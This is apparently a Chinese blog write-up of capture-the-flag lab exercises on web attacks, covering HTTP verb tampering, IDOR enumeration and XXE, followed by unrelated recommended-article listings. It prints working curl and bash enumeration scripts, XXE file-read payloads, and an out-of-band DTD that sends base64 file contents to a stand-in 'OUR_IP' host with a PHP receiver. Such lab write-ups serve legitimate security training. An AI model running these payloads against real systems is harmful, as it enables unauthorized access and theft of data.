nextcyber——web攻击

原创 于 2025-08-26 13:32:42 发布 · 649 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

web攻击

HTTP方法篡改

绕过基本身份验证

确认服务器是否接受 HEAD 请求,可以先发送一个 OPTIONS 请求来探测服务器支持的 HTTP 方法:

┌──(kali㉿kali)-[~]
└─$ curl -i -X OPTIONS http://10.22.119.82/                                      
HTTP/1.1 200 OK
Date: Mon, 25 Aug 2025 12:39:00 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.1.32
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

OPTIONS 方法返回 200 OK,说明服务器支持多种 HTTP 方法

尝试再次拦截 reset 请求,这次改用 DELETE 方法,成功:

:在这里插入图片描述

试着用你在本节中所学到的知识进入’reset.php’页面并删除所有文件。一旦所有的文件都被删除,你就能得到flag

NC{4lw4y5_c0v3r_4ll_v3rb5}

绕过安全过滤器

先用Burp Suite拦截请求,然后通过Change Request Method功能切换请求方法:

在这里插入图片描述

尝试通过HTTP Verb Tampering绕过命令注入过滤器,并获取到/flag.txt

NC{b3_v3rb_c0n51573n7}

IDOR漏洞

大规模 IDOR 枚举

发现文档目录

在这里插入图片描述

访问文档目录,得到flag

在这里插入图片描述

根据本节所学,在/documents.php中获得前20个用户uid的文件列表,并获取’flag_xxx.txt’文件中的flag

NC{4ll_f1l35_4r3_m1n3}

绕过编码

点击下载,使用bp拦截

在这里插入图片描述

尝试下载前20名

for i in $(seq 1 20); do 
    b64=$(echo -n $i | base64)
    echo -e "\n[+] 正在下载合同 $i (contract=$b64)\n"
    curl -s "http://10.22.36.166/download.php?contract=$b64" \
        -H "Cookie: PHPSESSID=v7be455hvvi3hpvaqmf2kmfl6m" \
done

尝试下载前20名雇员的合同,其中一个包含flag,提交作为答案

NC{h45h1n6_1d5_w0n7_570p_m3}

不安全的 API 中的 IDOR

直接用user5登录修改信息,然后bp拦截

在这里插入图片描述

尝试读取’uid=5’的用户的详细信息。他的’uuid’值是多少?

eb4fe264c10eb7a528b047aa983a4829

组合利用IDOR漏洞

┌──(kali㉿kali)-[~/Desktop]
└─$ vim shell.sh          
#!/usr/bin/env bash

BASE="http://10.22.153.60"
COOKIE="PHPSESSID=hfj7dbmmoopo00jbcoitdgp1ga"

for i in {1..20}; do
    resp=$(curl -s "${BASE}/profile/api.php/profile/$i" \
        -H "Cookie: $COOKIE" \
        -H "Accept: */*" \
        -H "Referer: ${BASE}/profile.php" \
        -H "Origin: $BASE" \
        -H "User-Agent: Mozilla/5.0")

    # 判断成功返回并打印用户信息
    echo "$resp" | grep -q '"success":true' || continue
    uid=$(echo "$resp" | grep -Po '"uid":"\K[^"]+')
    user=$(echo "$resp" | grep -Po '"username":"\K[^"]+')
    email=$(echo "$resp" | grep -Po '"email":"\K[^"]+')
    role=$(echo "$resp" | grep -Po '"role":"\K[^"]+')

    # 标记 admin
    if [[ "$role" =~ admin|Admin ]]; then
        echo "[HIGH] id=$uid user=$user email=$email role=$role"
    else
        echo "       id=$uid user=$user email=$email role=$role"
    fi
done

┌──(kali㉿kali)-[~/Desktop]
└─$ ./shell.sh

发现user10为管理员,执行 GET 请求查看用户详情,获取uuid,然后使用put将把管理员的电子邮件改为 “flag@idor.NC

在这里插入图片描述
在这里插入图片描述

刷新用户页面,得到flag

在这里插入图片描述

试着把管理员的电子邮件改为 “flag@idor.NC”,修改成功之后,你可以在 "编辑资料 "页面上得到这个标志。

NC{1_4m_4n_1d0r_m4573r}

XXE漏洞

本地文件读取

用Burp拦截HTTP请求,会得到以下请求内容

<!DOCTYPE test [

  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=connection.php">

]>

在这里插入图片描述

尝试读取’connection.php’文件的内容,并提交’api_key’的值作为答案。

UTM1NjM0MmRzJ2dmcTIzND0wMXJnZXdmc2RmCg

高级文件读取技术

尝试本节所说的方法没有回显,尝试上一节方法成功

在这里插入图片描述

尝试本章节的其他方法,读取’connection.php’文件的内容,并提交’api_key’的值作为答案。

UTM1NjM0MmRzJ2dmcTIzND0wMXJnZXdmc2RmCg

无回显数据读取

带外数据读取:

┌──(kali㉿kali)-[~]
└─$ vim xxe.dtd                                                                                                                                                             
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/327a6c4304ad5938eaf0efb6cc3e53dc.php">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

编写一个简单的PHP脚本来自动检测编码后的文件内容、解码并输出到终端:

┌──(kali㉿kali)-[~]
└─$ vim index.php
                                                                                                          
<?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

┌──(kali㉿kali)-[~]
└─$ php -S 0.0.0.0:8000   
[Mon Aug 25 20:20:27 2025] 10.22.160.215:47070 Accepted
[Mon Aug 25 20:20:27 2025] 10.22.160.215:47070 [200]: GET /xxe.dtd
[Mon Aug 25 20:20:27 2025] 10.22.160.215:47070 Closing
[Mon Aug 25 20:20:27 2025] 10.22.160.215:47072 Accepted
[Mon Aug 25 20:20:27 2025] 

NC{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}

需添加 &content;引用我们的实体,使其向我们的机器发送包含文件内容的请求:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

在这里插入图片描述

自动化 OOB 数据读取

┌──(kali㉿kali)-[~/XXEinjector-master]
└─$ ruby XXEinjector.rb --host=10.132.0.193 --httpport=8000 --file=xxe.req --path=/var/www/html/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter
┌──(kali㉿kali)-[~/XXEinjector-master]
└─$ cat ./Logs/10.22.160.215/var/www/html/327a6c4304ad5938eaf0efb6cc3e53dc.php.log           
NC{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}

在’/blind.html’页面上使用xxe盲注,读取web目录下的’327a6c4304ad5938eaf0efb6cc3e53dc.php’的内容并获得flag

NC{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}
nidaye_sun
关注
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8754
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
深入理解 Python Scapy 库:网络安全与协议分析的瑞士军刀
萧鼎的博客
08-25 556
网络安全、协议分析和渗透测试领域,有一个几乎无人不知的 Python 工具库 —— **Scapy**。它不仅是一个网络数据包的构造与解析工具,更是一个跨越开发、测试、调试、安全审计等场景的“瑞士军刀”。与传统的 Wireshark、tcpdump 等被动分析工具不同,Scapy 允许我们 **主动构造数据包、发送、捕获、修改、解析和分析**,并且可以灵活扩展,支持从二层到七层的多种协议。
Web安全攻防基础
qq_62189139的博客
08-19 1290
本文总结了常见的Web安全漏洞及防范措施。主要内容包括:1)SQL注入的原理、防范技巧和基本流程,强调预编译是最有效防范方式;2)XSS的分类(反射型、存储型、DOM型)及修复方法,建议输入输出过滤;3)文件上传漏洞的检测手段和绕过方式,如解析漏洞利用;4)业务逻辑漏洞类型(验证绕过、越权访问等);5)CSRF、XXE漏洞原理及与XSS的区别;6)文件包含漏洞的防范措施;7)Tomcat远程部署漏洞利用方法。
设计具有功能安全网络安全能力的新型半导体芯片
NewCarRen的博客
08-20 724
本文探讨了集成AI/ML加速器的功能安全半导体芯片设计,以满足软件定义汽车(SDV)的ASIL-B安全标准。研究提出了一种新型芯片架构,采用双核处理器、N模块冗余和AI驱动的故障检测机制,确保实时数据处理和预测性维护能力。芯片集成了安全启动、数据加密等网络安全功能,并支持传感器融合技术。通过严格的仿真验证,该设计在故障检测响应时间(<100ms)、OTA更新安全性(100%)和入侵检测率(95%)等方面表现优异。这种兼具功能安全网络安全的芯片为自动驾驶系统提供了高性能计算基础,同时满足ISO2626
网络与信息安全有哪些岗位:(6)安全开发工程师
锦鲤的博客
08-21 1227
安全开发工程师是网络安全的 “源头防线”—— 他们跳出 “漏洞出现后再修复” 的被动逻辑,通过 “设计时嵌入安全、编码时规范安全、测试时验证安全”,从根本上减少漏洞产生的可能。其岗位价值不仅在于 “减少漏洞数量”,更在于构建 “开发即安全” 的体系,让安全成为产品的 “固有属性” 而非 “附加功能”,是企业安全体系从 “被动防御” 走向 “主动免疫” 的关键力量。
安全、高效、可靠的物理隔离网络安全专用设备———信刻光盘安全隔离与文件单向导入系统!
cdprinter的博客
08-22 188
信刻最新推出安全、高效、可靠的物理隔离网络安全专用设备——光盘安全隔离与文件单向导入系统,基于物理隔离机制确保跨网数据传输安全,真正实现物理隔离网间数据交换既安全又高效,可追溯!产品利用智能机械手臂模拟人工自动抓盘刻录和读取,完成一系列光盘单向导入/导出操作。支持国产及Linux环境、Windows环境,此外,数据摆渡产品具备国家保密测评中心认证证书、网络安全证书,符合保密要求。
网络安全初级第一次作业
2301_80811863的博客
08-24 884
nginx可以进行静态文件的处理(html、css、js、图片)、不能直接返回php文件给前端中间件:应用服务器中间件信息收集(子域名、真实ip、注册人相关信息、备案号……)www.baidu.com aaa.baidu.com漏洞检测漏洞验证提取所需信息分析信息整理渗透测试报告生成信息收集域名收集子域名收集。
人工智能(AI)与网络安全
骥龙信息的博客
08-25 376
AI 在网络安全防御中展现多元化的价值
从成本中心到价值创造者:网络安全运维的实施框架与价值流转
huluang的专栏
08-24 53
网络安全运维已从传统"成本中心"转变为价值创造者。GB/T 45940-2025标准揭示了安全运维通过系统化的输入输出转换创造价值的框架:通过技术、人力等资源输入,转化为风险控制、合规保障等价值输出。标准详细规范了7个关键环节的实施过程,包括各环节的输入文档、处理过程和输出文档,形成完整的文档化管理体系。这种标准化方法使安全运维实现了从经验驱动到数据驱动的转变,通过文档化工作流程和成果,量化展现其对业务连续性、合规满足和效率提升的贡献价值,最终实现从成本消耗到价值创造的转型。
网络安全实验报告】实验六: 病毒防护实验
m0_73970214的博客
08-18 526
本实验通过Metasploit框架演示"永恒之蓝"漏洞的渗透过程。在KaliLinux环境下,首先使用smb_ms17_010模块扫描目标网段,确认靶机存在漏洞后,切换至ms17_010_eternalblue攻击模块进行渗透。成功获取权限后,上传并执行勒索病毒Wcry.exe,验证文件加密效果。实验需注意环境配置和系统版本确认,完整过程记录和成果文件可通过指定网盘链接获取。实验展示了永恒之蓝漏洞的完整利用链,包括扫描、渗透、载荷传递等关键环节。
全国网络安全知识竞赛有哪些
tinzoom的专栏
08-23 1165
全国范围内有多种类型的网络安全知识竞赛,涵盖国家级、行业级、高校、青少年和企业等多个维度。
Linux 进阶之性能调优,文件管理,网络安全
Toroto5的博客
08-24 742
系统性能调优是 Linux 管理中的关键技能,它能显著提升系统在不同应用场景下的表现。通过针对性的调优,可以解决资源瓶颈问题,提高服务响应速度,优化资源利用率。1. CPU 信息查看与分析2. 进程调度优化3. 高级调优工具优先级设置需谨慎多核优化策略监控与基准测试1. 内存监控工具2. 内存管理机制3. 优化技术交换空间配置原则交换使用监控内存泄漏检测1. 磁盘监控与分析2. I/O调度算法3. 文件系统优化不同存储介质优化RAID配置优化LVM优化数据库专用优化内核参数调整 服务管理优化Web
半年网络安全转型学习计划表(每天3小时)
witkey_ak9896的博客
08-24 679
摘要: 本文提供了一个为期6个月的网络安全转型学习计划,采用1/3理论+2/3实践的配比。计划分为6个阶段:1-4周网络系统基础,5-8周Web安全入门,9-12周渗透测试基础,13-16周漏洞原理与逆向,17-20周密码学,21-24周专项进阶。每天安排3小时(1小时理论+2小时实践),通过靶场实验巩固知识。6个月后可掌握渗透测试工具、常见漏洞利用、安全防御等核心技能,并能完成实战项目报告。计划强调动手实践,建议使用Kali、DVWA等工具进行实操训练。
常见WEB安全漏洞及防护措施
u012758488的博客
08-21 458
中如何防范常见的Web安全漏洞,包括SQL注入、XSS攻击、防盗链、CSRF攻击、文件上传漏洞和DDOS攻击等。攻击者诱导用户访问恶意页面,该页面自动向已认证的网站发起请求,利用用户的登录状态执行非授权操作。当应用直接将用户输入拼接到SQL语句中,攻击者可以插入恶意SQL片段,执行非授权操作。攻击者向网页注入恶意脚本,当其他用户浏览该页面时,脚本执行并窃取用户信息或进行恶意操作。盗链是指其他网站直接链接到你的静态资源(如图片、视频),消耗你的服务器带宽。-- 危险方式:避免使用v-html -->
【Linux基础知识系列】第一百一十篇 - 使用Nmap进行网络安全扫描
望获实时Linux系统
08-25 413
Nmap是一款功能强大的开源网络扫描工具,用于网络安全审计和漏洞检测。本文介绍了Nmap的核心功能,包括网络扫描、端口扫描、服务检测和操作系统识别,详细讲解了安装方法、基本命令和常用选项。通过示例演示了如何扫描主机、子网,以及如何保存和解读扫描结果。文章还提供了实用建议,如定期扫描、使用详细模式和自动任务设置,帮助用户有效进行网络安全评估。掌握Nmap的使用能显著提升网络安全管理能力,及时发现潜在漏洞。
Fortune Teller (霄占)_ A Python-based divination platform that
08-25
Fortune Teller (霄占)_ A Python-based divination platform that uses LLMs to provide personalized fortune readings through multiple systems including BaZi, tarot, and zodiac astrology. 基于Python的多系统算命程序,使用LLM(大型语言模型)进行解读。.zip
一个基于qwen-max-latest(LLM) + paraformer-realtime-v2(ASR)的一个实时语
08-25
一个基于qwen-max-latest(LLM) + paraformer-realtime-v2(ASR)的一个实时语音AI面试助手.zip
基于LLM开发的一些应用工具.zip
最新发布
08-25
基于LLM开发的一些应用工具.zip
一个基于LLM的高质量数据生成器.zip
08-25
一个基于LLM的高质量数据生成器.zip
TMS320F28335主控与EtherCAT伺服方案结合实现高精度运动控制
08-25
TMS320F28335主控芯片与EtherCAT通信协议在伺服控制系统中的结合应用。首先阐述了EtherCAT的特点及其在工业自动化领域的优势,接着重点讲解了TMS320F28335的功能特性,特别是在伺服控制方面的表现。随后讨论了两者结合的具体方式,包括硬件连接、软件编程等方面的内容,并提供了部分示例代码。最后展望了这种组合在未来工业自动化发展中的潜力。 适合人群:从事工业自动化、运动控制相关工作的工程师和技术人员。 使用场景及目标:适用于需要构建高效、稳定的伺服控制系统的企业和个人开发者,旨在提升系统的响应速度和控制精度。 其他说明:文中不仅有理论分析,还有实际操作指导,对于想要深入了解TMS320F28335与EtherCAT配合使用的读者非常有价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值